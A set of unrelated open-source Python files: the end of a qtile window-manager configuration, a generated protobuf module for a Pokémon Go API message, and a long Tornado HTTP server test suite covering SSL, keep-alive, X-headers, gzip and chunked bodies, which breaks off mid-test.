tree layout Key([mod], "r", lazy.layout.sort_windows(window_sorter)), # for tree layout Key([mod, "shift"], "h", lazy.layout.move_left()), Key([mod, "shift"], "l", lazy.layout.move_right()), Key([mod, "control"], "l", lazy.layout.increase_ratio()), Key([mod, "control"], "h", lazy.layout.decrease_ratio()), Key([mod], "comma", lazy.layout.increase_nmaster()), Key([mod], "period", lazy.layout.decrease_nmaster()), Key([mod], "Tab", lazy.group.next_window()), Key([mod, "shift"], "Tab", lazy.group.prev_window()), Key([mod, "shift"], "Return", lazy.layout.rotate()), Key([mod, "shift"], "space", lazy.layout.toggle_split()), Key([mod], "w", lazy.to_screen(0)), Key([mod], "e", lazy.to_screen(1)), Key([mod], "space", lazy.nextlayout()), Key([mod], "c", lazy.window.kill()), Key([mod], "t", lazy.window.disable_floating()), Key([mod, "shift"], "t", lazy.window.enable_floating()), Key([mod], "p", lazy.spawn("exec dmenu_run " "-fn 'Consolas:size=13' -nb '#000000' -nf '#ffffff' -b")), Key([mod], "b", lazy.spawn("~/note/conf/uzbl/open_history")), Key([mod, "shift"], "b", lazy.spawn("~/note/conf/uzbl/open_bookmark")), Key([mod], "s", lazy.spawn("~/note/conf/uzbl/open_ddg")), Key([mod, "shift"], "s", lazy.spawn("~/note/conf/uzbl/open_goog")), Key([mod], "q", lazy.spawn('xtrlock')), Key([mod], "y", lazy.spawn('xclip -o -selection primary | xclip -selection clipboard')), Key([mod], "u", lazy.spawn('xclip -o -selection clipboard | xclip -selection primary')), Key([], "XF86AudioRaiseVolume", lazy.spawn("amixer sset Master 5%+")), Key([], "XF86AudioLowerVolume", lazy.spawn("amixer sset Master 5%-")), Key([], "XF86AudioMute", lazy.spawn("amixer sset Master toggle")), Key(["shift"], "XF86AudioRaiseVolume", lazy.spawn("mpc volume +5")), Key(["shift"], "XF86AudioLowerVolume", lazy.spawn("mpc volume -5")), Key(["shift"], "XF86AudioMute", lazy.spawn("mpc toggle")), Key([mod], "Left", lazy.prevgroup()), Key([mod], "Right", lazy.nextgroup()), ] mouse = [ Drag([mod], "Button1", lazy.window.set_position_floating(), start=lazy.window.get_position()), Drag([mod], "Button3", lazy.window.set_size_floating(), start=lazy.window.get_size()), Click([mod], "Button2", lazy.window.bring_to_front()) ] border = dict( border_normal='#808080', border_width=2, ) layouts = [ layout.Tile(**border), layout.Max(), layout.Stack(**border), layout.TreeTab(sections=['Surfing', 'E-mail', 'Docs', 'Incognito']), layout.Slice('left', 320, wmclass='pino', fallback=layout.Slice('right', 320, role='roster', fallback=layout.Stack(1, **border))), layout.Slice('left', 192, role='gimp-toolbox', fallback=layout.Slice('right', 256, role='gimp-dock', fallback=layout.Stack(1, **border))), ] floating_layout = layout.Floating(**border) groups = [ Group('1'), Group('2', layout='max'), Group('3'), Group('4', layout='treetab'), Group('5'), Group('6'), Group('7'), Group('8'), Group('9'), ] for i in groups: keys.append( Key([mod], i.name, lazy.group[i.name].toscreen()) ) keys.append( Key([mod, "shift"], i.name, lazy.window.togroup(i.name)) ) screens = [ Screen( top = bar.Bar( [ widget.GroupBox(borderwidth=2, font='Consolas',fontsize=18, padding=1, margin_x=1, margin_y=1), widget.Sep(), widget.WindowName( font='Consolas',fontsize=18, margin_x=6), widget.Sep(), widget.Battery( font='Consolas',fontsize=18, margin_x=6), widget.Sep(), widget.CPUGraph(), widget.MemoryGraph(), widget.SwapGraph(foreground='C02020'), widget.Sep(), widget.Systray(), widget.Sep(), widget.Clock('%H:%M:%S %d.%m.%Y', font='Consolas', fontsize=18, padding=6), ], 24, ), ), ] @hook.subscribe.client_new def dialogs(window): if(window.window.get_wm_type() == 'dialog' or window.window.get_wm_transient_for()): window.floating = True
andrelaszlo/qtile
examples/config/tailhook-config.py
Python
mit
6,113
0.003278
# Generated by the protocol buffer compiler. DO NOT EDIT! # source: POGOProtos/Networking/Requests/Messages/CollectDailyDefenderBonusMessage.proto import sys _b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1')) from google.protobuf import descriptor as _descriptor from google.protobuf import message as _message from google.protobuf import reflection as _reflection from google.protobuf import symbol_database as _symbol_database from google.protobuf import descriptor_pb2 # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() DESCRIPTOR = _descriptor.FileDescriptor( name='POGOProtos/Networking/Requests/Messages/CollectDailyDefenderBonusMessage.proto', package='POGOProtos.Networking.Requests.Messages', syntax='proto3', serialized_pb=_b('\nNPOGOProtos/Networking/Requests/Messages/CollectDailyDefenderBonusMessage.proto\x12\'POGOProtos.Networking.Requests.Messages\"\"\n CollectDailyDefenderBonusMessageb\x06proto3') ) _sym_db.RegisterFileDescriptor(DESCRIPTOR) _COLLECTDAILYDEFENDERBONUSMESSAGE = _descriptor.Descriptor( name='CollectDailyDefenderBonusMessage', full_name='POGOProtos.Networking.Requests.Messages.CollectDailyDefenderBonusMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=123, serialized_end=157, ) DESCRIPTOR.message_types_by_name['CollectDailyDefenderBonusMessage'] = _COLLECTDAILYDEFENDERBONUSMESSAGE CollectDailyDefenderBonusMessage = _reflection.GeneratedProtocolMessageType('CollectDailyDefenderBonusMessage', (_message.Message,), dict( DESCRIPTOR = _COLLECTDAILYDEFENDERBONUSMESSAGE, __module__ = 'POGOProtos.Networking.Requests.Messages.CollectDailyDefenderBonusMessage_pb2' # @@protoc_insertion_point(class_scope:POGOProtos.Networking.Requests.Messages.CollectDailyDefenderBonusMessage) )) _sym_db.RegisterMessage(CollectDailyDefenderBonusMessage) # @@protoc_insertion_point(module_scope)
Mickey32111/pogom
pogom/pgoapi/protos/POGOProtos/Networking/Requests/Messages/CollectDailyDefenderBonusMessage_pb2.py
Python
mit
2,108
0.010436
#!/usr/bin/env python from __future__ import absolute_import, division, print_function, with_statement from tornado import netutil from tornado.escape import json_decode, json_encode, utf8, _unicode, recursive_unicode, native_str from tornado import gen from tornado.http1connection import HTTP1Connection from tornado.httpserver import HTTPServer from tornado.httputil import HTTPHeaders, HTTPMessageDelegate, HTTPServerConnectionDelegate, ResponseStartLine from tornado.iostream import IOStream from tornado.log import gen_log from tornado.netutil import ssl_options_to_context from tornado.simple_httpclient import SimpleAsyncHTTPClient from tornado.testing import AsyncHTTPTestCase, AsyncHTTPSTestCase, AsyncTestCase, ExpectLog, gen_test from tornado.test.util import unittest, skipOnTravis from tornado.web import Application, RequestHandler, asynchronous, stream_request_body from contextlib import closing import datetime import gzip import os import shutil import socket import ssl import sys import tempfile from io import BytesIO def read_stream_body(stream, callback): """Reads an HTTP response from `stream` and runs callback with its headers and body.""" chunks = [] class Delegate(HTTPMessageDelegate): def headers_received(self, start_line, headers): self.headers = headers def data_received(self, chunk): chunks.append(chunk) def finish(self): callback((self.headers, b''.join(chunks))) conn = HTTP1Connection(stream, True) conn.read_response(Delegate()) class HandlerBaseTestCase(AsyncHTTPTestCase): def get_app(self): return Application([('/', self.__class__.Handler)]) def fetch_json(self, *args, **kwargs): response = self.fetch(*args, **kwargs) response.rethrow() return json_decode(response.body) class HelloWorldRequestHandler(RequestHandler): def initialize(self, protocol="http"): self.expected_protocol = protocol def get(self): if self.request.protocol != self.expected_protocol: raise Exception("unexpected protocol") self.finish("Hello world") def post(self): self.finish("Got %d bytes in POST" % len(self.request.body)) # In pre-1.0 versions of openssl, SSLv23 clients always send SSLv2 # ClientHello messages, which are rejected by SSLv3 and TLSv1 # servers. Note that while the OPENSSL_VERSION_INFO was formally # introduced in python3.2, it was present but undocumented in # python 2.7 skipIfOldSSL = unittest.skipIf( getattr(ssl, 'OPENSSL_VERSION_INFO', (0, 0)) < (1, 0), "old version of ssl module and/or openssl") class BaseSSLTest(AsyncHTTPSTestCase): def get_app(self): return Application([('/', HelloWorldRequestHandler, dict(protocol="https"))]) class SSLTestMixin(object): def get_ssl_options(self): return dict(ssl_version=self.get_ssl_version(), # type: ignore **AsyncHTTPSTestCase.get_ssl_options()) def get_ssl_version(self): raise NotImplementedError() def test_ssl(self): response = self.fetch('/') self.assertEqual(response.body, b"Hello world") def test_large_post(self): response = self.fetch('/', method='POST', body='A' * 5000) self.assertEqual(response.body, b"Got 5000 bytes in POST") def test_non_ssl_request(self): # Make sure the server closes the connection when it gets a non-ssl # connection, rather than waiting for a timeout or otherwise # misbehaving. with ExpectLog(gen_log, '(SSL Error|uncaught exception)'): with ExpectLog(gen_log, 'Uncaught exception', required=False): self.http_client.fetch( self.get_url("/").replace('https:', 'http:'), self.stop, request_timeout=3600, connect_timeout=3600) response = self.wait() self.assertEqual(response.code, 599) def test_error_logging(self): # No stack traces are logged for SSL errors. with ExpectLog(gen_log, 'SSL Error') as expect_log: self.http_client.fetch( self.get_url("/").replace("https:", "http:"), self.stop) response = self.wait() self.assertEqual(response.code, 599) self.assertFalse(expect_log.logged_stack) # Python's SSL implementation differs significantly between versions. # For example, SSLv3 and TLSv1 throw an exception if you try to read # from the socket before the handshake is complete, but the default # of SSLv23 allows it. class SSLv23Test(BaseSSLTest, SSLTestMixin): def get_ssl_version(self): return ssl.PROTOCOL_SSLv23 @skipIfOldSSL class SSLv3Test(BaseSSLTest, SSLTestMixin): def get_ssl_version(self): return ssl.PROTOCOL_SSLv3 @skipIfOldSSL class TLSv1Test(BaseSSLTest, SSLTestMixin): def get_ssl_version(self): return ssl.PROTOCOL_TLSv1 @unittest.skipIf(not hasattr(ssl, 'SSLContext'), 'ssl.SSLContext not present') class SSLContextTest(BaseSSLTest, SSLTestMixin): def get_ssl_options(self): context = ssl_options_to_context( AsyncHTTPSTestCase.get_ssl_options(self)) assert isinstance(context, ssl.SSLContext) return context class BadSSLOptionsTest(unittest.TestCase): def test_missing_arguments(self): application = Application() self.assertRaises(KeyError, HTTPServer, application, ssl_options={ "keyfile": "/__missing__.crt", }) def test_missing_key(self): """A missing SSL key should cause an immediate exception.""" application = Application() module_dir = os.path.dirname(__file__) existing_certificate = os.path.join(module_dir, 'test.crt') existing_key = os.path.join(module_dir, 'test.key') self.assertRaises((ValueError, IOError), HTTPServer, application, ssl_options={ "certfile": "/__mising__.crt", }) self.assertRaises((ValueError, IOError), HTTPServer, application, ssl_options={ "certfile": existing_certificate, "keyfile": "/__missing__.key" }) # This actually works because both files exist HTTPServer(application, ssl_options={ "certfile": existing_certificate, "keyfile": existing_key, }) class MultipartTestHandler(RequestHandler): def post(self): self.finish({"header": self.request.headers["X-Header-Encoding-Test"], "argument": self.get_argument("argument"), "filename": self.request.files["files"][0].filename, "filebody": _unicode(self.request.files["files"][0]["body"]), }) # This test is also called from wsgi_test class HTTPConnectionTest(AsyncHTTPTestCase): def get_handlers(self): return [("/multipart", MultipartTestHandler), ("/hello", HelloWorldRequestHandler)] def get_app(self): return Application(self.get_handlers()) def raw_fetch(self, headers, body, newline=b"\r\n"): with closing(IOStream(socket.socket())) as stream: stream.connect(('127.0.0.1', self.get_http_port()), self.stop) self.wait() stream.write( newline.join(headers + [utf8("Content-Length: %d" % len(body))]) + newline + newline + body) read_stream_body(stream, self.stop) headers, body = self.wait() return body def test_multipart_form(self): # Encodings here are tricky: Headers are latin1, bodies can be # anything (we use utf8 by default). response = self.raw_fetch([ b"POST /multipart HTTP/1.0", b"Content-Type: multipart/form-data; boundary=1234567890", b"X-Header-encoding-test: \xe9", ], b"\r\n".join([ b"Content-Disposition: form-data; name=argument", b"", u"\u00e1".encode("utf-8"), b"--1234567890", u'Content-Disposition: form-data; name="files"; filename="\u00f3"'.encode("utf8"), b"", u"\u00fa".encode("utf-8"), b"--1234567890--", b"", ])) data = json_decode(response) self.assertEqual(u"\u00e9", data["header"]) self.assertEqual(u"\u00e1", data["argument"]) self.assertEqual(u"\u00f3", data["filename"]) self.assertEqual(u"\u00fa", data["filebody"]) def test_newlines(self): # We support both CRLF and bare LF as line separators. for newline in (b"\r\n", b"\n"): response = self.raw_fetch([b"GET /hello HTTP/1.0"], b"", newline=newline) self.assertEqual(response, b'Hello world') def test_100_continue(self): # Run through a 100-continue interaction by hand: # When given Expect: 100-continue, we get a 100 response after the # headers, and then the real response after the body. stream = IOStream(socket.socket(), io_loop=self.io_loop) stream.connect(("127.0.0.1", self.get_http_port()), callback=self.stop) self.wait() stream.write(b"\r\n".join([b"POST /hello HTTP/1.1", b"Content-Length: 1024", b"Expect: 100-continue", b"Connection: close", b"\r\n"]), callback=self.stop) self.wait() stream.read_until(b"\r\n\r\n", self.stop) data = self.wait() self.assertTrue(data.startswith(b"HTTP/1.1 100 "), data) stream.write(b"a" * 1024) stream.read_until(b"\r\n", self.stop) first_line = self.wait() self.assertTrue(first_line.startswith(b"HTTP/1.1 200"), first_line) stream.read_until(b"\r\n\r\n", self.stop) header_data = self.wait() headers = HTTPHeaders.parse(native_str(header_data.decode('latin1'))) stream.read_bytes(int(headers["Content-Length"]), self.stop) body = self.wait() self.assertEqual(body, b"Got 1024 bytes in POST") stream.close() class EchoHandler(RequestHandler): def get(self): self.write(recursive_unicode(self.request.arguments)) def post(self): self.write(recursive_unicode(self.request.arguments)) class TypeCheckHandler(RequestHandler): def prepare(self): self.errors = {} fields = [ ('method', str), ('uri', str), ('version', str), ('remote_ip', str), ('protocol', str), ('host', str), ('path', str), ('query', str), ] for field, expected_type in fields: self.check_type(field, getattr(self.request, field), expected_type) self.check_type('header_key', list(self.request.headers.keys())[0], str) self.check_type('header_value', list(self.request.headers.values())[0], str) self.check_type('cookie_key', list(self.request.cookies.keys())[0], str) self.check_type('cookie_value', list(self.request.cookies.values())[0].value, str) # secure cookies self.check_type('arg_key', list(self.request.arguments.keys())[0], str) self.check_type('arg_value', list(self.request.arguments.values())[0][0], bytes) def post(self): self.check_type('body', self.request.body, bytes) self.write(self.errors) def get(self): self.write(self.errors) def check_type(self, name, obj, expected_type): actual_type = type(obj) if expected_type != actual_type: self.errors[name] = "expected %s, got %s" % (expected_type, actual_type) class HTTPServerTest(AsyncHTTPTestCase): def get_app(self): return Application([("/echo", EchoHandler), ("/typecheck", TypeCheckHandler), ("//doubleslash", EchoHandler), ]) def test_query_string_encoding(self): response = self.fetch("/echo?foo=%C3%A9") data = json_decode(response.body) self.assertEqual(data, {u"foo": [u"\u00e9"]}) def test_empty_query_string(self): response = self.fetch("/echo?foo=&foo=") data = json_decode(response.body) self.assertEqual(data, {u"foo": [u"", u""]}) def test_empty_post_parameters(self): response = self.fetch("/echo", method="POST", body="foo=&bar=") data = json_decode(response.body) self.assertEqual(data, {u"foo": [u""], u"bar": [u""]}) def test_types(self): headers = {"Cookie": "foo=bar"} response = self.fetch("/typecheck?foo=bar", headers=headers) data = json_decode(response.body) self.assertEqual(data, {}) response = self.fetch("/typecheck", method="POST", body="foo=bar", headers=headers) data = json_decode(response.body) self.assertEqual(data, {}) def test_double_slash(self): # urlparse.urlsplit (which tornado.httpserver used to use # incorrectly) would parse paths beginning with "//" as # protocol-relative urls. response = self.fetch("//doubleslash") self.assertEqual(200, response.code) self.assertEqual(json_decode(response.body), {}) def test_malformed_body(self): # parse_qs is pretty forgiving, but it will fail on python 3 # if the data is not utf8. On python 2 parse_qs will work, # but then the recursive_unicode call in EchoHandler will # fail. if str is bytes: return with ExpectLog(gen_log, 'Invalid x-www-form-urlencoded body'): response = self.fetch( '/echo', method="POST", headers={'Content-Type': 'application/x-www-form-urlencoded'}, body=b'\xe9') self.assertEqual(200, response.code) self.assertEqual(b'{}', response.body) class HTTPServerRawTest(AsyncHTTPTestCase): def get_app(self): return Application([ ('/echo', EchoHandler), ]) def setUp(self): super(HTTPServerRawTest, self).setUp() self.stream = IOStream(socket.socket()) self.stream.connect(('127.0.0.1', self.get_http_port()), self.stop) self.wait() def tearDown(self): self.stream.close() super(HTTPServerRawTest, self).tearDown() def test_empty_request(self): self.stream.close() self.io_loop.add_timeout(datetime.timedelta(seconds=0.001), self.stop) self.wait() def test_malformed_first_line(self): with ExpectLog(gen_log, '.*Malformed HTTP request line'): self.stream.write(b'asdf\r\n\r\n') # TODO: need an async version of ExpectLog so we don't need # hard-coded timeouts here. self.io_loop.add_timeout(datetime.timedelta(seconds=0.05), self.stop) self.wait() def test_malformed_headers(self): with ExpectLog(gen_log, '.*Malformed HTTP headers'): self.stream.write(b'GET / HTTP/1.0\r\nasdf\r\n\r\n') self.io_loop.add_timeout(datetime.timedelta(seconds=0.05), self.stop) self.wait() def test_chunked_request_body(self): # Chunked requests are not widely supported and we don't have a way # to generate them in AsyncHTTPClient, but HTTPServer will read them. self.stream.write(b"""\ POST /echo HTTP/1.1 Transfer-Encoding: chunked Content-Type: application/x-www-form-urlencoded 4 foo= 3 bar 0 """.replace(b"\n", b"\r\n")) read_stream_body(self.stream, self.stop) headers, response = self.wait() self.assertEqual(json_decode(response), {u'foo': [u'bar']}) def test_chunked_request_uppercase(self): # As per RFC 2616 section 3.6, "Transfer-Encoding" header's value is # case-insensitive. self.stream.write(b"""\ POST /echo HTTP/1.1 Transfer-Encoding: Chunked Content-Type: application/x-www-form-urlencoded 4 foo= 3 bar 0 """.replace(b"\n", b"\r\n")) read_stream_body(self.stream, self.stop) headers, response = self.wait() self.assertEqual(json_decode(response), {u'foo': [u'bar']}) def test_invalid_content_length(self): with ExpectLog(gen_log, '.*Only integer Content-Length is allowed'): self.stream.write(b"""\ POST /echo HTTP/1.1 Content-Length: foo bar """.replace(b"\n", b"\r\n")) self.stream.read_until_close(self.stop) self.wait() class XHeaderTest(HandlerBaseTestCase): class Handler(RequestHandler): def get(self): self.write(dict(remote_ip=self.request.remote_ip, remote_protocol=self.request.protocol)) def get_httpserver_options(self): return dict(xheaders=True) def test_ip_headers(self): self.assertEqual(self.fetch_json("/")["remote_ip"], "127.0.0.1") valid_ipv4 = {"X-Real-IP": "4.4.4.4"} self.assertEqual( self.fetch_json("/", headers=valid_ipv4)["remote_ip"], "4.4.4.4") valid_ipv4_list = {"X-Forwarded-For": "127.0.0.1, 4.4.4.4"} self.assertEqual( self.fetch_json("/", headers=valid_ipv4_list)["remote_ip"], "4.4.4.4") valid_ipv6 = {"X-Real-IP": "2620:0:1cfe:face:b00c::3"} self.assertEqual( self.fetch_json("/", headers=valid_ipv6)["remote_ip"], "2620:0:1cfe:face:b00c::3") valid_ipv6_list = {"X-Forwarded-For": "::1, 2620:0:1cfe:face:b00c::3"} self.assertEqual( self.fetch_json("/", headers=valid_ipv6_list)["remote_ip"], "2620:0:1cfe:face:b00c::3") invalid_chars = {"X-Real-IP": "4.4.4.4<script>"} self.assertEqual( self.fetch_json("/", headers=invalid_chars)["remote_ip"], "127.0.0.1") invalid_chars_list = {"X-Forwarded-For": "4.4.4.4, 5.5.5.5<script>"} self.assertEqual( self.fetch_json("/", headers=invalid_chars_list)["remote_ip"], "127.0.0.1") invalid_host = {"X-Real-IP": "www.google.com"} self.assertEqual( self.fetch_json("/", headers=invalid_host)["remote_ip"], "127.0.0.1") def test_scheme_headers(self): self.assertEqual(self.fetch_json("/")["remote_protocol"], "http") https_scheme = {"X-Scheme": "https"} self.assertEqual( self.fetch_json("/", headers=https_scheme)["remote_protocol"], "https") https_forwarded = {"X-Forwarded-Proto": "https"} self.assertEqual( self.fetch_json("/", headers=https_forwarded)["remote_protocol"], "https") bad_forwarded = {"X-Forwarded-Proto": "unknown"} self.assertEqual( self.fetch_json("/", headers=bad_forwarded)["remote_protocol"], "http") class SSLXHeaderTest(AsyncHTTPSTestCase, HandlerBaseTestCase): def get_app(self): return Application([('/', XHeaderTest.Handler)]) def get_httpserver_options(self): output = super(SSLXHeaderTest, self).get_httpserver_options() output['xheaders'] = True return output def test_request_without_xprotocol(self): self.assertEqual(self.fetch_json("/")["remote_protocol"], "https") http_scheme = {"X-Scheme": "http"} self.assertEqual( self.fetch_json("/", headers=http_scheme)["remote_protocol"], "http") bad_scheme = {"X-Scheme": "unknown"} self.assertEqual( self.fetch_json("/", headers=bad_scheme)["remote_protocol"], "https") class ManualProtocolTest(HandlerBaseTestCase): class Handler(RequestHandler): def get(self): self.write(dict(protocol=self.request.protocol)) def get_httpserver_options(self): return dict(protocol='https') def test_manual_protocol(self): self.assertEqual(self.fetch_json('/')['protocol'], 'https') @unittest.skipIf(not hasattr(socket, 'AF_UNIX') or sys.platform == 'cygwin', "unix sockets not supported on this platform") class UnixSocketTest(AsyncTestCase): """HTTPServers can listen on Unix sockets too. Why would you want to do this? Nginx can proxy to backends listening on unix sockets, for one thing (and managing a namespace for unix sockets can be easier than managing a bunch of TCP port numbers). Unfortunately, there's no way to specify a unix socket in a url for an HTTP client, so we have to test this by hand. """ def setUp(self): super(UnixSocketTest, self).setUp() self.tmpdir = tempfile.mkdtemp() self.sockfile = os.path.join(self.tmpdir, "test.sock") sock = netutil.bind_unix_socket(self.sockfile) app = Application([("/hello", HelloWorldRequestHandler)]) self.server = HTTPServer(app, io_loop=self.io_loop) self.server.add_socket(sock) self.stream = IOStream(socket.socket(socket.AF_UNIX), io_loop=self.io_loop) self.stream.connect(self.sockfile, self.stop) self.wait() def tearDown(self): self.stream.close() self.server.stop() shutil.rmtree(self.tmpdir) super(UnixSocketTest, self).tearDown() def test_unix_socket(self): self.stream.write(b"GET /hello HTTP/1.0\r\n\r\n") self.stream.read_until(b"\r\n", self.stop) response = self.wait() self.assertEqual(response, b"HTTP/1.1 200 OK\r\n") self.stream.read_until(b"\r\n\r\n", self.stop) headers = HTTPHeaders.parse(self.wait().decode('latin1')) self.stream.read_bytes(int(headers["Content-Length"]), self.stop) body = self.wait() self.assertEqual(body, b"Hello world") def test_unix_socket_bad_request(self): # Unix sockets don't have remote addresses so they just return an # empty string. with ExpectLog(gen_log, "Malformed HTTP message from"): self.stream.write(b"garbage\r\n\r\n") self.stream.read_until_close(self.stop) response = self.wait() self.assertEqual(response, b"") class KeepAliveTest(AsyncHTTPTestCase): """Tests various scenarios for HTTP 1.1 keep-alive support. These tests don't use AsyncHTTPClient because we want to control connection reuse and closing. """ def get_app(self): class HelloHandler(RequestHandler): def get(self): self.finish('Hello world') def post(self): self.finish('Hello world') class LargeHandler(RequestHandler): def get(self): # 512KB should be bigger than the socket buffers so it will # be written out in chunks. self.write(''.join(chr(i % 256) * 1024 for i in range(512))) class FinishOnCloseHandler(RequestHandler): @asynchronous def get(self): self.flush() def on_connection_close(self): # This is not very realistic, but finishing the request # from the close callback has the right timing to mimic # some errors seen in the wild. self.finish('closed') return Application([('/', HelloHandler), ('/large', LargeHandler), ('/finish_on_close', FinishOnCloseHandler)]) def setUp(self): super(KeepAliveTest, self).setUp() self.http_version = b'HTTP/1.1' def tearDown(self): # We just closed the client side of the socket; let the IOLoop run # once to make sure the server side got the message. self.io_loop.add_timeout(datetime.timedelta(seconds=0.001), self.stop) self.wait() if hasattr(self, 'stream'): self.stream.close() super(KeepAliveTest, self).tearDown() # The next few methods are a crude manual http client def connect(self): self.stream = IOStream(socket.socket(), io_loop=self.io_loop) self.stream.connect(('127.0.0.1', self.get_http_port()), self.stop) self.wait() def read_headers(self): self.stream.read_until(b'\r\n', self.stop) first_line = self.wait() self.assertTrue(first_line.startswith(b'HTTP/1.1 200'), first_line) self.stream.read_until(b'\r\n\r\n', self.stop) header_bytes = self.wait() headers = HTTPHeaders.parse(header_bytes.decode('latin1')) return headers def read_response(self): self.headers = self.read_headers() self.stream.read_bytes(int(self.headers['Content-Length']), self.stop) body = self.wait() self.assertEqual(b'Hello world', body) def close(self): self.stream.close() del self.stream def test_two_requests(self): self.connect() self.stream.write(b'GET / HTTP/1.1\r\n\r\n') self.read_response() self.stream.write(b'GET / HTTP/1.1\r\n\r\n') self.read_response() self.close() def test_request_close(self): self.connect() self.stream.write(b'GET / HTTP/1.1\r\nConnection: close\r\n\r\n') self.read_response() self.stream.read_until_close(callback=self.stop) data = self.wait() self.assertTrue(not data) self.close() # keepalive is supported for http 1.0 too, but it's opt-in def test_http10(self): self.http_version = b'HTTP/1.0' self.connect() self.stream.write(b'GET / HTTP/1.0\r\n\r\n') self.read_response() self.stream.read_until_close(callback=self.stop) data = self.wait() self.assertTrue(not data) self.assertTrue('Connection' not in self.headers) self.close() def test_http10_keepalive(self): self.http_version = b'HTTP/1.0' self.connect() self.stream.write(b'GET / HTTP/1.0\r\nConnection: keep-alive\r\n\r\n') self.read_response() self.assertEqual(self.headers['Connection'], 'Keep-Alive') self.stream.write(b'GET / HTTP/1.0\r\nConnection: keep-alive\r\n\r\n') self.read_response() self.assertEqual(self.headers['Connection'], 'Keep-Alive') self.close() def test_http10_keepalive_extra_crlf(self): self.http_version = b'HTTP/1.0' self.connect() self.stream.write(b'GET / HTTP/1.0\r\nConnection: keep-alive\r\n\r\n\r\n') self.read_response() self.assertEqual(self.headers['Connection'], 'Keep-Alive') self.stream.write(b'GET / HTTP/1.0\r\nConnection: keep-alive\r\n\r\n') self.read_response() self.assertEqual(self.headers['Connection'], 'Keep-Alive') self.close() def test_pipelined_requests(self): self.connect() self.stream.write(b'GET / HTTP/1.1\r\n\r\nGET / HTTP/1.1\r\n\r\n') self.read_response() self.read_response() self.close() def test_pipelined_cancel(self): self.connect() self.stream.write(b'GET / HTTP/1.1\r\n\r\nGET / HTTP/1.1\r\n\r\n') # only read once self.read_response() self.close() def test_cancel_during_download(self): self.connect() self.stream.write(b'GET /large HTTP/1.1\r\n\r\n') self.read_headers() self.stream.read_bytes(1024, self.stop) self.wait() self.close() def test_finish_while_closed(self): self.connect() self.stream.write(b'GET /finish_on_close HTTP/1.1\r\n\r\n') self.read_headers() self.close() def test_keepalive_chunked(self): self.http_version = b'HTTP/1.0' self.connect() self.stream.write(b'POST / HTTP/1.0\r\nConnection: keep-alive\r\n' b'Transfer-Encoding: chunked\r\n' b'\r\n0\r\n') self.read_response() self.assertEqual(self.headers['Connection'], 'Keep-Alive') self.stream.write(b'GET / HTTP/1.0\r\nConnection: keep-alive\r\n\r\n') self.read_response() self.assertEqual(self.headers['Connection'], 'Keep-Alive') self.close() class GzipBaseTest(object): def get_app(self): return Application([('/', EchoHandler)]) def post_gzip(self, body): bytesio = BytesIO() gzip_file = gzip.GzipFile(mode='w', fileobj=bytesio) gzip_file.write(utf8(body)) gzip_file.close() compressed_body = bytesio.getvalue() return self.fetch('/', method='POST', body=compressed_body, headers={'Content-Encoding': 'gzip'}) def test_uncompressed(self): response = self.fetch('/', method='POST', body='foo=bar') self.assertEquals(json_decode(response.body), {u'foo': [u'bar']}) class GzipTest(GzipBaseTest, AsyncHTTPTestCase): def get_httpserver_options(self): return dict(decompress_request=True) def test_gzip(self): response = self.post_gzip('foo=bar') self.assertEquals(json_decode(response.body), {u'foo': [u'bar']}) class GzipUnsupportedTest(GzipBaseTest, AsyncHTTPTestCase): def test_gzip_unsupported(self): # Gzip support is opt-in; without it the server fails to parse # the body (but parsing form bodies is currently just a log message, # not a fatal error). with ExpectLog(gen_log, "Unsupported Content-Encoding"): response = self.post_gzip('foo=bar') self.assertEquals(json_decode(response.body), {}) class StreamingChunkSizeTest(AsyncHTTPTestCase): # 50 characters long, and repetitive so it can be compressed. BODY = b'01234567890123456789012345678901234567890123456789' CHUNK_SIZE = 16 def get_http_client(self): # body_producer doesn't work on curl_httpclient, so override the # configured AsyncHTTPClient implementation. return SimpleAsyncHTTPClient(io_loop=self.io_loop) def get_httpserver_options(self): return dict(chunk_size=self.CHUNK_SIZE, decompress_request=True) class MessageDelegate(HTTPMessageDelegate): def __init__(self, connection): self.connection = connection def headers_received(self, start_line, headers): self.chunk_lengths = [] def data_received(self, chunk): self.chunk_lengths.append(len(chunk)) def finish(self): response_body = utf8(json_encode(self.chunk_lengths)) self.connection.write_headers( ResponseStartLine('HTTP/1.1', 200, 'OK'), HTTPHeaders({'Content-Length': str(len(response_body))})) self.connection.write(response_body) self.connection.finish() def get_app(self): class App(HTTPServerConnectionDelegate): def start_request(self, server_conn, request_conn): return StreamingChunkSizeTest.MessageDelegate(request_conn) return App() def fetch_chunk_sizes(self, **kwargs): response = self.fetch('/', method='POST', **kwargs) response.rethrow() chunks = json_decode(response.body) self.assertEqual(len(self.BODY), sum(chunks)) for chunk_size in chunks: self.assertLessEqual(chunk_size, self.CHUNK_SIZE, 'oversized chunk: ' + str(chunks)) self.assertGreater(chunk_size, 0, 'empty chunk: ' + str(chunks)) return chunks def compress(self, body): bytesio = BytesIO() gzfile = gzip.GzipFile(mode='w', fileobj=bytesio) gzfile.write(body) gzfile.close() compressed = bytesio.getvalue() if len(compressed) >= len(body): raise Exception("body did not shrink when compressed") return compressed def test_regular_body(self): chunks = self.fetch_chunk_sizes(body=self.BODY) # Without compression we know exactly what to expect. self.assertEqual([16, 16, 16, 2], chunks) def test_compressed_body(self): self.fetch_chunk_sizes(body=self.compress(self.BODY), headers={'Content-Encoding': 'gzip'}) # Compression creates irregular boundaries so the assertions # in fetch_chunk_sizes are as specific as we can get. def test_chunked_body(self): def body_producer(write): write(self.BODY[:20]) write(self.BODY[20:]) chunks = self.fetch_chunk_sizes(body_producer=body_producer) # HTTP chunk boundaries translate to application-visible breaks self.assertEqual([16, 4, 16, 14], chunks) def test_chunked_compressed(self): compressed = self.compress(self.BODY) self.assertGreater(len(compressed), 20) def body_producer(write): write(compressed[:20]) write(compressed[20:]) self.fetch_chunk_sizes(body_producer=body_producer, headers={'Content-Encoding': 'gzip'}) class MaxHeaderSizeTest(AsyncHTTPTestCase): def get_app(self): return Application([('/', HelloWorldRequestHandler)]) def get_httpserver_options(self): return dict(max_header_size=1024) def test_small_headers(self): response = self.fetch("/", headers={'X-Filler': 'a' * 100}) response.rethrow() self.assertEqual(response.body, b"Hello world") def test_large_headers(self): with ExpectLog(gen_log, "Unsatisfiable read", required=False): response = self.fetch("/", headers={'X-Filler': 'a' * 1000}) 